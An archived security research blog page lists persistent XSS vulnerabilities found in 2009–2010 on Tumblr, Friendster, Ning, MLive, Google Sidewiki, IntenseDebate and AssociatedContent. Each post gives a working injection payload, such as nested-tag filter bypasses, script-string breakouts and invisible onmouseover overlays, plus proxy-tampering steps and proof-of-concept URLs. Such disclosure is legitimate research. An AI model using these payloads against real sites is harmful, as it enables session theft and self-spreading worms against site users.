This site is soon to be deprecated by http://www.johnleitch.net
Showing posts with label type 2 xss. Show all posts
Showing posts with label type 2 xss. Show all posts

Saturday, May 8, 2010

Tumblr.com Persistent XSS

onmouseover attributes added to user submitted markup via HTTP proxy are not stripped.

Exploit: Create a new link, add a description, and set the HTML to <h1>test</h1>. Submit the form and capture the request using an HTTP proxy (e.g. Fiddler). Change the post[three] value to <h1 onmouseover="alert(0)">test</h1> and resume the request.

PoC: http://asdfffffffff.tumblr.com/
Posted by John Leitch at 2:59 PM 8 comments
Labels: , , , , , , , ,

Thursday, May 6, 2010

Friendster.com Persistent XSS

Only one sanitization pass is performed on user submited data.

Exploit: <<z>script>alert(0)<<z>/script>

PoC: http://profiles.friendster.com/31202727
Posted by John Leitch at 7:00 PM 4 comments
Labels: , , , , ,

Sunday, May 2, 2010

Friendster.com Persistent XSS

Data submitted via album description and a few other fields is not properly escaped before being rendered into javascript.

Exploit: \";alert(0);//

PoC: http://www.friendster.com/viewalbums.php?uid=120927091
Posted by John Leitch at 1:13 PM 0 comments
Labels: , , , , ,

Monday, April 26, 2010

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1
Posted by John Leitch at 7:01 PM 1 comments
Labels: , , , , , , , , ,

Monday, November 2, 2009

Free Rein - MLive.com

MLive's profile system has no XSS protection. HTML of any sort can be entered in the About Me field.

http://connect.mlive.com/user/XSSBlog/index.html
Posted by John Leitch at 1:47 PM 0 comments
Labels: , , , , , , , , ,

Wednesday, September 30, 2009

Persistent XSS Vulnerability - Google.com

Here's a good one: Google Sidewiki has a type 2 XSS vulnerability. Upon editing an entry (and possibly when adding one, I didn't test it) an HTTP proxy such as Fiddler can be used to alter the pagetitle field.



The code replacing the pagetitle value is as follows.
<<a>a onmouseout=alert(0)>a

The a tag is stripped out, but as only one pass is performed a new a tag is created.
<a onmouseout=alert(0)>a

The result is a profile containing the arbitrary code.



http://www.google.com/profiles/108489460074237220044?hl=en#sidewiki
Posted by John Leitch at 6:25 PM 2 comments
Labels: , , , , , , , , , , ,

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133
Posted by John Leitch at 2:45 PM 4 comments
Labels: , , , , , , , , , ,

Saturday, September 19, 2009

Persistent XSS Vulnerability - AssociatedContent.com

Several of the fields of Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.





The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html
Posted by John Leitch at 1:40 PM 3 comments
Labels: , , , , , , , , , ,
Subscribe to: Posts (Atom)